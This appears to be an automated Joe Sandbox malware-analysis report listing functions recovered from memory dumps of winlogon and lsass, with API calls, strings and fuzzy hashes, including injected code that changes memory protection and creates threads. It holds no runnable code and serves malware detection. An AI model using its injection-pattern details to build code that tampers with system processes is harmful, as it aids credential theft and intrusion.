Source File: 0000001B.00000002.2669173215.000001FC603B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001FC603B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc603b0000_winlogon.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: ce89c3a478c7ecc9287d59998c8c5d0090ad324ff43092cb3eba14b843e48e4f
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: EC11063AACCE8B01F6641165E7523F900706BD737AF480634AA7EF6BDA8A18CC427180

Function 000001FC5FFA12B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000001FC5FFA12E0
_set_statfp.LIBCMT ref: 000001FC5FFA12FB
_set_statfp.LIBCMT ref: 000001FC5FFA1317
_set_statfp.LIBCMT ref: 000001FC5FFA1353

Memory Dump Source

Source File: 0000001B.00000002.2665367132.000001FC5FF90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC5FF90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc5ff90000_winlogon.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 26b6d6c0ab04ca405c119fa9272bd038b4362be13ebacdfc232e1fb3f6f6a357
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 3D115E36754F0B01F65C176DE7513F910C0EB54364F8A0735AAF666EFA9A14E843E980

Function 000001FC60391EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000001FC60391EE0
_set_statfp.LIBCMT ref: 000001FC60391EFB
_set_statfp.LIBCMT ref: 000001FC60391F17
_set_statfp.LIBCMT ref: 000001FC60391F53

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 599fa6197969762b27291c9f2da21687f7b97e80731df781125fd591bccc6b86
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 2D117332ADCE0F01FAA81164E75A3F550796BE4376F044734AA7FB67D6AB648C427180

Function 000001FC603B84F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001FC603B8503
_IsNonwritableInCurrentImage.LIBCMT ref: 000001FC603B8598

Strings

f, xrefs: 000001FC603B8516
csm, xrefs: 000001FC603B857E

Memory Dump Source

Source File: 0000001B.00000002.2669173215.000001FC603B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001FC603B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc603b0000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 7e306056165e1336ae39aba320c3ee9485ca1981374495b04a275e11fd69a753
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 1151A03275960B8ADB14CF15D644BB833A5F3A0BADF518135DA0EA3748DBB4C841E784

Function 000001FC5FF984F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001FC5FF98503
_IsNonwritableInCurrentImage.LIBCMT ref: 000001FC5FF98598

Strings

f, xrefs: 000001FC5FF98516
csm, xrefs: 000001FC5FF9857E

Memory Dump Source

Source File: 0000001B.00000002.2665367132.000001FC5FF90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC5FF90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc5ff90000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: a0d813220cf0482d1f20778ec6943c7ae4a244570c2e0533a9665dac9f2fc9a9
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 11518F327116078ADB588F15E744BAA33D5F344B98F9182349A7647B68DB34EC42E784

Function 000001FC603B84D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001FC603B8503
_IsNonwritableInCurrentImage.LIBCMT ref: 000001FC603B8598

Strings

f, xrefs: 000001FC603B8516
csm, xrefs: 000001FC603B857E

Memory Dump Source

Source File: 0000001B.00000002.2669173215.000001FC603B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001FC603B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc603b0000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: c6216e32dab998d8666c67e76f2f5d7154d6c4f6ef960d4a7bc74d03d1f5b601
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: 3D31E23124964B86E720DF12EA447B937B4F391BEEF058035AE4EA3744CB78C941D784

Function 000001FC5FF984D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001FC5FF98503
_IsNonwritableInCurrentImage.LIBCMT ref: 000001FC5FF98598

Strings

f, xrefs: 000001FC5FF98516
csm, xrefs: 000001FC5FF9857E

Memory Dump Source

Source File: 0000001B.00000002.2665367132.000001FC5FF90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC5FF90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc5ff90000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: 2af33683b6fe8550ffcce70d0e1bc7b887a9a44179292900d4e51f526fc9a40d
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: EC31D33230164786E718DF16FA447AA37E4F740F98F858224AE6607F64CB38E946D784

Function 000001FC603814B4 Relevance: 6.3, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001FC603814D5
HeapFree.KERNEL32 ref: 000001FC603814E4
GetProcessHeap.KERNEL32 ref: 000001FC603814F0
HeapFree.KERNEL32 ref: 000001FC603814FF
GetProcessHeap.KERNEL32 ref: 000001FC6038152A

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: fc420431358bd0942ab8cb7418bab57f420269e40f755e9827258351f81f4a45
Instruction ID: 435f36251ac0540e1c90ebac8a490209eae2c8416b84082ce04b572610d2327c
Opcode Fuzzy Hash: fc420431358bd0942ab8cb7418bab57f420269e40f755e9827258351f81f4a45
Instruction Fuzzy Hash: 5D118C32258F8992E754AF66A9002AA7370F3C9B95F044039DB9E53724EF3CC4019780

Function 000001FC603826F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001FC603827D4
StrCpyW.SHLWAPI ref: 000001FC603827ED

Strings

\\.\pipe\, xrefs: 000001FC603827DF

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: 355d35ed9a98e14393d1b91ae178479c73bade615d909a5a28d6a73d24c602bc
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: 1A71B43224878A86EB649F25DB543FA67B0F7C4BA5F440076DD4DA3B89DF34C904A780

Function 000001FC603824DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001FC603825C3
StrCpyW.SHLWAPI ref: 000001FC603825DA

Strings

\\.\pipe\, xrefs: 000001FC603825CE

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: 0321353bfca6e806b3ded378fafae337fd5472ec846abbee39139c98ea2c1bf5
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: A051E93228C78B83E6349E2997543FA6671F3C57A1F050075CD8EA3B99EA75CC059BC0

Function 000001FC60390604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000001FC6039071B
GetLastError.KERNEL32 ref: 000001FC6039073D

Strings

U, xrefs: 000001FC603906C7

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: 856263d06813d6216ac69eb590b8440b3ad29f388452e33b739934a1558a1b05
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: 2141A072318A8985EB209F65E5443EAA7B1F3C87A5F404035EE8ED7798EB3CC551DB80

Function 000001FC6038D6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000001FC6038D6F9
LCMapStringW.KERNEL32 ref: 000001FC6038D781

Strings

LCMapStringEx, xrefs: 000001FC6038D6DC, 000001FC6038D6ED

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: efee1e06e5be33ba347c4fe89364d6e302e1d8531846499a7612db4d02967a22
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: B211363A208B8586D760CF16B5806AAB7B0F7C8BA0F544136EE8D93B19DF38C4408B80

Function 000001FC603894A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000001FC603894E8
RaiseException.KERNEL32 ref: 000001FC6038952E

Strings

csm, xrefs: 000001FC6038951B

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: 68b0e11ecf267070e8992325780b8fe598d74f02aff5d9d05fbf38fc76ea5eb8
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: 7C114C32248B8582EB618F15E5402A977B0F7C8BA9F1C4271DF8D57B68DF38C951CB40

Function 000001FC6038D65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000001FC6038D68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000001FC6038D6A7

Strings

InitializeCriticalSectionEx, xrefs: 000001FC6038D681

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: 7381c16c04756bade18992daec71db1ac544fd200be29a40d75d9243e06dca08
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: A4F0E236358B8981E7059B41F6406F42330BBC8BB2F584032A95D63B55EE38C994E780

Function 000001FC603BCB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000001FC603BCBC5

Strings

November, xrefs: 000001FC603BCBA8, 000001FC603BCBB2
October, xrefs: 000001FC603BCBBE

Memory Dump Source

Source File: 0000001B.00000002.2669173215.000001FC603B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001FC603B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc603b0000_winlogon.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: b2060d99c9590ffd9e3db98e7245cfa4350d172b5ce92bfd4195fa69dfb60fd7
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: 08E0ED3129864F82FA149B00AA412F822309BE436AF5D5031955CA6353CF38C882A280

Function 000001FC5FF9CB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000001FC5FF9CBC5

Strings

October, xrefs: 000001FC5FF9CBBE
November, xrefs: 000001FC5FF9CBA8, 000001FC5FF9CBB2

Memory Dump Source

Source File: 0000001B.00000002.2665367132.000001FC5FF90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC5FF90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc5ff90000_winlogon.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: 86f206bb6fa989b7fba63d4501f2f6f54567f6b72db013eb725ee6e505a9c6df
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: F2E06D7130454B92EB0EAB59E7402F822A1DB84744F595232967906AB2CE38E887E2D0

Function 000001FC6038D608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000001FC6038D631
TlsSetValue.KERNEL32 ref: 000001FC6038D648

Strings

FlsSetValue, xrefs: 000001FC6038D61E

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: edca27b7ebbdd9f943bb6f26796d219d6848e2166861eddfd7f3176813c15a43
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: 44E02271288A4E91EB044B50FA00BF42332BBC87A2F888032D91DA6351EE38C984E780

Function 000001FC60381D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001FC60381D9B
HeapAlloc.KERNEL32 ref: 000001FC60381DAA
GetProcessHeap.KERNEL32 ref: 000001FC60381E1E
HeapFree.KERNEL32 ref: 000001FC60381E2C

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: c70ec8b87a504af3b9ad863b38cc926dedd8eb74880745dbcb0d83ad1dd3d035
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: E9218132648F8582EB519F59E5002AAF3B4FBC8BA5F054131DE8DA7B24FE78C5469740

Function 000001FC60381274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001FC6038127A
HeapAlloc.KERNEL32 ref: 000001FC60381289
GetProcessHeap.KERNEL32 ref: 000001FC603812A3
HeapAlloc.KERNEL32 ref: 000001FC603812B4

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 35c3756962c5562a654fd0bedc64e89372423ecbdf3fe00b1e48af45ba268580
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 27E06DB1691A0586EB04AF66D8043A936F1FBC8F26F48C034C90D47370EF7D8499D780

Analysis Process: lsass.exePID: 628, Parent PID: 2788COMMON

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	120
Total number of Limit Nodes:	10

Executed Functions

Function 00000161C73726F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNEL32 ref: 00000161C73727D4
StrCpyW.SHLWAPI ref: 00000161C73727ED

Strings

\\.\pipe\, xrefs: 00000161C73727DF

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: 3b735bbee88240beb0042c2673311db08eb741bb010bf6b337d51c30165cfd58
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: 6D71C332290781A6E764DF26DE443FEE7A0F789B84F4CA016DD4947B89DEB7C5448704

Function 00000161C73721CC Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 164
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIW.SHLWAPI ref: 00000161C7372270

Part of subcall function 00000161C73730B4: GetProcessHeap.KERNEL32 ref: 00000161C73730D7
Part of subcall function 00000161C73730B4: HeapAlloc.KERNEL32 ref: 00000161C73730EA
Part of subcall function 00000161C73730B4: StrCmpNIW.SHLWAPI ref: 00000161C737316B
Part of subcall function 00000161C73730B4: GetProcessHeap.KERNEL32 ref: 00000161C73731D1
Part of subcall function 00000161C73730B4: HeapFree.KERNEL32 ref: 00000161C73731DF

Strings

S, xrefs: 00000161C7372391
dialer, xrefs: 00000161C7372269

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: S$dialer
API String ID: 756756679-3873981283
Opcode ID: a6338c422d047c8eae01fcbeb907d454b031cf1b87c932ac2c197f7c23e38add
Instruction ID: 555f768c87bb5bdd5ab62e889d32ab1ec1f331125eff70bc0d1f7cbc86b016e3
Opcode Fuzzy Hash: a6338c422d047c8eae01fcbeb907d454b031cf1b87c932ac2c197f7c23e38add
Instruction Fuzzy Hash: 2251AD32B50B28A6FBA0CB669E406FDA3F4F704794F18E415EE4526B84DFB6C891C714

Function 00000161C7371AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 00000161C7371AD8
StrCmpNIW.SHLWAPI ref: 00000161C7371AF2
lstrlenW.KERNEL32 ref: 00000161C7371B01
StrCpyW.SHLWAPI ref: 00000161C7371B16

Strings

\\?\, xrefs: 00000161C7371AE6

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: 97fd48db990becca548c7dadd739733bbc1cfd7508f65c741642b883cb6e23c5
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: CBF04472344645A2E720DB21FD943EDA760F784BD8F889021CA494A654DFBEC648C700

Function 00000161C7373458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 00000161C737347A
PathFindFileNameW.SHLWAPI ref: 00000161C7373489

Part of subcall function 00000161C7373930: StrCmpNIW.SHLWAPI ref: 00000161C7373948

Part of subcall function 00000161C7373878: GetModuleHandleW.KERNEL32 ref: 00000161C7373886
Part of subcall function 00000161C7373878: GetCurrentProcess.KERNEL32 ref: 00000161C73738B4
Part of subcall function 00000161C7373878: VirtualProtectEx.KERNEL32 ref: 00000161C73738D6
Part of subcall function 00000161C7373878: GetCurrentProcess.KERNEL32 ref: 00000161C73738F4
Part of subcall function 00000161C7373878: VirtualProtectEx.KERNEL32 ref: 00000161C7373915

CreateThread.KERNEL32 ref: 00000161C73734D7

Part of subcall function 00000161C7371EB4: GetCurrentThread.KERNEL32 ref: 00000161C7371EBF

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: 6d0effa7bb4d5690b5f4c55d47c5fe974bb2e1f2b279a6883094caf7890b65f8
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: 41115E71AD0692B2FB65D721EE477FDA2A4A755344F4C212699468D2D4EFFBC0848600

Function 00000161C7371C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000161C7371650: GetProcessHeap.KERNEL32 ref: 00000161C737165B
Part of subcall function 00000161C7371650: HeapAlloc.KERNEL32 ref: 00000161C737166A
Part of subcall function 00000161C7371650: RegOpenKeyExW.ADVAPI32 ref: 00000161C73716DA
Part of subcall function 00000161C7371650: RegOpenKeyExW.ADVAPI32 ref: 00000161C7371707
Part of subcall function 00000161C7371650: RegCloseKey.ADVAPI32 ref: 00000161C7371721
Part of subcall function 00000161C7371650: RegOpenKeyExW.ADVAPI32 ref: 00000161C7371741
Part of subcall function 00000161C7371650: RegCloseKey.ADVAPI32 ref: 00000161C737175C
Part of subcall function 00000161C7371650: RegOpenKeyExW.ADVAPI32 ref: 00000161C737177C
Part of subcall function 00000161C7371650: RegCloseKey.ADVAPI32 ref: 00000161C7371797
Part of subcall function 00000161C7371650: RegOpenKeyExW.ADVAPI32 ref: 00000161C73717B7
Part of subcall function 00000161C7371650: RegCloseKey.ADVAPI32 ref: 00000161C73717D2
Part of subcall function 00000161C7371650: RegOpenKeyExW.ADVAPI32 ref: 00000161C73717F2

Sleep.KERNEL32 ref: 00000161C7371C43
SleepEx.KERNELBASE ref: 00000161C7371C49

Part of subcall function 00000161C7371650: RegCloseKey.ADVAPI32 ref: 00000161C737180D
Part of subcall function 00000161C7371650: RegOpenKeyExW.ADVAPI32 ref: 00000161C737182D
Part of subcall function 00000161C7371650: RegCloseKey.ADVAPI32 ref: 00000161C7371848
Part of subcall function 00000161C7371650: RegOpenKeyExW.ADVAPI32 ref: 00000161C7371868
Part of subcall function 00000161C7371650: RegCloseKey.ADVAPI32 ref: 00000161C7371883
Part of subcall function 00000161C7371650: RegOpenKeyExW.ADVAPI32 ref: 00000161C73718A3
Part of subcall function 00000161C7371650: RegCloseKey.ADVAPI32 ref: 00000161C73718BE
Part of subcall function 00000161C7371650: RegCloseKey.ADVAPI32 ref: 00000161C73718C8

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: 7058e5d3243450c72a3909cd1a310112313b080e642f7e4db5cc7658ddc42f00
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: 6631CC77280A05B1FA54DF26DF813FE92A5ABC4BD0F0C6022DE09876D6EEA6C8508650

Function 00000161C7342908 Relevance: 1.7, APIs: 1, Instructions: 186
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00000161C7342A31

Memory Dump Source

Source File: 0000001E.00000002.2683325193.00000161C7340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7340000_lsass.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
